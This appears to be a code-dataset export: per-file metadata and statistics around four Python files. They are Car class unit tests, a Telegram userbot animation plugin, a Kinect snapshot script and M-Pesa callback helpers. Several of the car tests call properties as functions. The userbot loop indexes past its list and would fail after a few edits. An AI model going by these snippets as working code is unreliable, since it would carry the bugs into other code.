| 104.6 | 346 | 0.742377 | 1,242 | 9,937 | 5.809984 | 0.096618 | 0.031042 | 0.042129 | 0.05765 | 0.846729 | 0.836752 | 0.823309 | 0.787001 | 0.778409 | 0.724501 | 0 | 0.029679 | 0.115025 | 9,937 | 94 | 347 | 105.712766 | 0.79088 | 0.002113 | 0 | 0.278481 | 0 | 0.341772 | 0.552295 | 0.285426 | 0 | 0 | 0 | 0 | 0.367089 | 1 | 0.113924 | false | 0 | 0.050633 | 0 | 0.177215 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
004ce0bd22e8ee64f43db1cfbd07722f54e195ec | 6,282 | py | Python | testing/test/car/car_manager_test.py | Xamaneone/Python-OOP | 7514cdc92bb4f7adf27666516739cbf42a35453c | [
"MIT"
] | null | null | null | testing/test/car/car_manager_test.py | Xamaneone/Python-OOP | 7514cdc92bb4f7adf27666516739cbf42a35453c | [
"MIT"
] | null | null | null | testing/test/car/car_manager_test.py | Xamaneone/Python-OOP | 7514cdc92bb4f7adf27666516739cbf42a35453c | [
"MIT"
] | null | null | null | import unittest
from car_manager import Car
class CarTests(unittest.TestCase):
make = 'make'
model = 'model'
fuel_consumption = 10
fuel_capacity = 100
def test_car_make_setter__when_None__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception) as context:
car.make = None
self.assertEqual('Make cannot be null or empty!', str(context.exception))
def test_car_make_setter__when_empty__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception) as context:
car.make("")
self.assertEqual('Make cannot be null or empty!', str(context.exception))
def test_car_make_setter__when_provided_test__expect_make_to_be_changed(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
expect = "test"
car.make(expect)
self.assertEqual(expect, car.make)
def test_car_model_setter__when_None__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception) as context:
car.model = None
self.assertEqual('Model cannot be null or empty!', str(context.exception))
def test_car_model_setter__when_empty__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception) as context:
car.model('')
self.assertEqual('Model cannot be null or empty!', str(context.exception))
def test_car_model_setter__when_provided_test__expect_model_to_be_changed(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
expect = "test"
car.model(expect)
self.assertEqual(expect, car.model)
def test_car_fuel_consumption_getter__when_changed__expect_to_be_changed(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
car.fuel_consumption(5)
self.assertEqual(5, car.fuel_consumption)
def test_car_fuel_consumption_getter__when_changed_with_negative__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception):
car.fuel_consumption(-5)
def test_car_fuel_consumption_setter__when_None__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception):
car.fuel_consumption(None)
def test_car_fuel_consumption_setter__when_changing__expect_to_be_changed(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
car.fuel_consumption(14)
self.assertEqual(14, car.fuel_consumption)
def test_car_refuel__when_provided_fuel_is_0__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception):
car.refuel(0)
def test_car_refuel__when_provided_fuel_is_negative__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception):
car.refuel(-1)
def test_car_refuel__when_provided_fuel_is_correct__expect_to_increase_fuel_amount_by_provided_fuel(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
fuel = 50
car.refuel(fuel)
self.assertEqual(fuel, car.fuel_amount)
def test_car_refuel__when_provided_fuel_is_more_than_fuel_capacity__expect_to_increase_fuel_amount_to_fuel_capacity(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
fuel = 50
car.refuel(car.fuel_capacity * 3)
self.assertEqual(100, car.fuel_amount)
def test_car_fuel_amount_setter__when_changed__expect_to_be_changed(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
car.fuel_amount(5)
self.assertEqual(5, car.fuel_amount)
def test_car_fuel_amount_setter__when_changed_with_negative__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception):
car.fuel_amount(-50)
def test_car_fuel_amount_setter__when_None__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception):
car.fuel_amount(None)
def test_car_fuel_amount_setter__when_negative__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception):
car.fuel_amount(-50)
def test_car_drive__when_enough_fuel__expect_lowered_fuel(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
car.fuel_capacity = 50
car.drive(100)
self.assertEqual(40, car.fuel_amount)
def test_car_drive__when_not_enough_fuel__expect_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
car.fuel_capacity = 50
with self.assertRaises(Exception):
car.drive(1000)
def test_car_fuel_capacity_setter__when_None__except_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception):
car.fuel_capacity(None)
def test_car_fuel_capacity_setter__when_changed__except_to_be_changed(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
car.fuel_capacity(60)
self.assertEqual(60, car.fuel_capacity)
def test_car_fuel_capacity_setter__when_negative__except_exception(self):
car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)
with self.assertRaises(Exception):
car.fuel_capacity(-16)
if __name__ == '__main__':
unittest.main()
| 41.328947 | 126 | 0.724928 | 845 | 6,282 | 4.985799 | 0.078107 | 0.087349 | 0.054593 | 0.07643 | 0.892713 | 0.842867 | 0.810824 | 0.764301 | 0.717304 | 0.717304 | 0 | 0.009404 | 0.18752 | 6,282 | 151 | 127 | 41.602649 | 0.816027 | 0 | 0 | 0.441441 | 0 | 0 | 0.022763 | 0 | 0 | 0 | 0 | 0 | 0.243243 | 1 | 0.207207 | false | 0 | 0.018018 | 0 | 0.27027 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9dde919659995a9643af3c0223feb9c3622f730c | 6,863 | py | Python | userbot/plugins/marte.py | rxrx3/IndianBot | 19d52ae46b30c4fef56762415b0e43204f8c1220 | [
"MIT"
] | null | null | null | userbot/plugins/marte.py | rxrx3/IndianBot | 19d52ae46b30c4fef56762415b0e43204f8c1220 | [
"MIT"
] | null | null | null | userbot/plugins/marte.py | rxrx3/IndianBot | 19d52ae46b30c4fef56762415b0e43204f8c1220 | [
"MIT"
] | 1 | 2020-09-11T16:37:56.000Z | 2020-09-11T16:37:56.000Z | from telethon import events
import asyncio
from uniborg.util import admin_cmd
@borg.on(admin_cmd(pattern=r"marte"))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.3
animation_ttl = range(0, 549755813888)
await event.edit("🔵🔴 🔴🔵")
animation_chars = [
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
"`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
"`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 549755813888])
| 41.847561 | 59 | 0.422264 | 780 | 6,863 | 4.446154 | 0.048718 | 0.49827 | 0.747405 | 0.420992 | 0.913495 | 0.913495 | 0.913495 | 0.913495 | 0.913495 | 0.913495 | 0 | 0.006372 | 0.382632 | 6,863 | 163 | 60 | 42.104294 | 0.675242 | 0 | 0 | 0.90566 | 0 | 0 | 0.588955 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.018868 | 0 | 0.025157 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
9dec51afc8bcb23268f8d45d87a79e9fda3cd634 | 169 | py | Python | misc/KinectSnap.py | FYP-DES5/deepscan-core | b6ce70ae69577fbdf5b80b30c4e83c7ee9cf6942 | [
"MIT"
] | null | null | null | misc/KinectSnap.py | FYP-DES5/deepscan-core | b6ce70ae69577fbdf5b80b30c4e83c7ee9cf6942 | [
"MIT"
] | null | null | null | misc/KinectSnap.py | FYP-DES5/deepscan-core | b6ce70ae69577fbdf5b80b30c4e83c7ee9cf6942 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import freenect
import sys
freenect.sync_get_depth()[0].dump(sys.argv[-1] + "_depth.p")
freenect.sync_get_video()[0].dump(sys.argv[-1] + "_video.p")
| 21.125 | 60 | 0.704142 | 29 | 169 | 3.896552 | 0.517241 | 0.212389 | 0.265487 | 0.212389 | 0.230089 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.076923 | 169 | 7 | 61 | 24.142857 | 0.698718 | 0.094675 | 0 | 0 | 0 | 0 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
d17ab5304943b21d45adc6fe74f53b47f43a0a24 | 2,771 | py | Python | zazi/apps/mpesa_proxy/utils.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | null | null | null | zazi/apps/mpesa_proxy/utils.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | 1 | 2021-08-20T06:41:57.000Z | 2021-08-20T06:41:57.000Z | zazi/apps/mpesa_proxy/utils.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | null | null | null | from zazi.core import service
from django.conf import settings
from django.shortcuts import reverse
#-------
def c2b_stk_push_callback_url(data, organization_id=None, reference=None):
url = reverse('mpesa_c2b_stk_push_callback_url', kwargs={
"organization_id": organization_id,
"reference": reference
})
return service.post(url, json=data, api_url=settings.MPESA_API_URL)
def c2b_validation_url(data, organization_id=None, reference=None):
url = reverse('mpesa_c2b_validation_url', kwargs={
"organization_id": organization_id,
"reference": reference
})
return service.post(url, json=data, api_url=settings.MPESA_API_URL)
def c2b_confirmation_url(data, organization_id=None, reference=None):
url = reverse('mpesa_c2b_confirmation_url', kwargs={
"organization_id": organization_id,
"reference": reference
})
return service.post(url, json=data, api_url=settings.MPESA_API_URL)
#-------
def balance_check_result_url(data, organization_id=None, reference=None):
url = reverse('mpesa_balance_check_result_url', kwargs={
"organization_id": organization_id,
"reference": reference
})
return service.post(url, json=data, api_url=settings.MPESA_API_URL)
def balance_check_queue_timeout_url(data, organization_id=None, reference=None):
url = reverse('mpesa_balance_check_queue_timeout_url', kwargs={
"organization_id": organization_id,
"reference": reference
})
return service.post(url, json=data, api_url=settings.MPESA_API_URL)
#-------
def reversal_result_url(data, organization_id=None, reference=None):
url = reverse('mpesa_reversal_result_url', kwargs={
"organization_id": organization_id,
"reference": reference
})
return service.post(url, json=data, api_url=settings.MPESA_API_URL)
def reversal_queue_timeout_url(data, organization_id=None, reference=None):
url = reverse('mpesa_reversal_queue_timeout_url', kwargs={
"organization_id": organization_id,
"reference": reference
})
return service.post(url, json=data, api_url=settings.MPESA_API_URL)
#-------
def b2c_result_url(data, organization_id=None, reference=None):
url = reverse('mpesa_b2c_result_url', kwargs={
"organization_id": organization_id,
"reference": reference
})
return service.post(url, json=data, api_url=settings.MPESA_API_URL)
def b2c_queue_timeout_url(data, organization_id=None, reference=None):
url = reverse('mpesa_b2c_queue_timeout_url', kwargs={
"organization_id": organization_id,
"reference": reference
})
return service.post(url, json=data, api_url=settings.MPESA_API_URL)
| 31.850575 | 80 | 0.709491 | 344 | 2,771 | 5.386628 | 0.104651 | 0.203994 | 0.092283 | 0.101997 | 0.928764 | 0.910955 | 0.910955 | 0.910955 | 0.910955 | 0.910955 | 0 | 0.004386 | 0.177192 | 2,771 | 86 | 81 | 32.22093 | 0.808333 | 0.010105 | 0 | 0.631579 | 0 | 0 | 0.170928 | 0.084733 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0.052632 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.